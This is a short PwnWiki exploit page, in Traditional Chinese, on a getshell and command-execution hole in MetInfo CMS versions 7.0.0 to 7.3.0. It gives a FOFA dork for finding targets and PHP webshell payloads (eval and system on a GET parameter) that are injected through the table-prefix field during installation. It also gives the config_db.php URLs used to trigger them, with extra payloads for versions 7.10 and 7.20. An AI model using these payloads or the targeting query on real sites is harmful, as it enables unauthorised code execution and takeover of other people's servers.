米拓建站系統 getshell&命令執行漏洞

From PwnWiki
Other languages:
Chinese • ‎中文(繁體)‎

FOFA

body="MetInfo"

影響版本

7.3.0- 7.0.0

漏洞利用

在安裝該CMS - 【設置數據庫信息(數據表前綴)】:


代碼執行Payload:

"/@eval($_GET['1']);/


命令執行payload:

"/@system($_GET['1']);/

點擊保存進行下一步驗證,出現報錯信息


(這裏的Payload是代碼執行)

訪問以下url:

http://<target>/config/config_db.php?1=phpinfo();

可以看到成功執行了phpinfo


(這裏的Payload是命令執行)

訪問以下URL:

http://<target>/config/config_db.php?1=id();

成功執行id命令。


其他

Version 7.10 
Payload:"/@eval($_GET['1']);@system($_GET['2']);/
Version 7.20
Payload: "/@eval($_GET['1']);@system($_GET['2']);/